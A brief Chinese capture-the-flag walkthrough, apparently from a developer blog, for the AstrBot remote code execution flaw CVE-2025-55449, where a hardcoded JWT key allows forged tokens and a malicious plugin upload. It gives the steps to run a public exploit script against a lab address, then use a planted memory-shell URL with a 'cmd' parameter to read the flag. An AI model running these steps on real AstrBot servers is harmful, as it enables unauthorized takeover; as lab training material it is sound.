靶标介绍:

AstrBot 是一款开源的 AI 聊天机器人框架,其旧版本(≤3.5.17)的 Web 管理接口存在远程代码执行漏洞(CVE-2025-55449),由于硬编码 JWT 签名密钥,未授权远程攻击者可伪造身份令牌,获取任意用户权限。后续可通过 install-upload 接口上传恶意插件,实现任意代码执行,导致服务器失陷。

打开是这样

然后去这个大佬这里把python脚本下载解压下来

GitHub - Marven11/CVE-2025-55449-AstrBot-RCE: AstrBot老版本RCE · GitHub

下载完了就unzip就可以 

unzip完就cd进去 

之后就python3 main.py http://39.106.48.123:17975    

等脚本跑完就出来http://39.106.48.123:17975//test_memshell?cmd=id

然后 cat /flag就可以了

Logo

DAMO开发者矩阵,由阿里巴巴达摩院和中国互联网协会联合发起,致力于探讨最前沿的技术趋势与应用成果,搭建高质量的交流与分享平台,推动技术创新与产业应用链接,围绕“人工智能与新型计算”构建开放共享的开发者生态。

更多推荐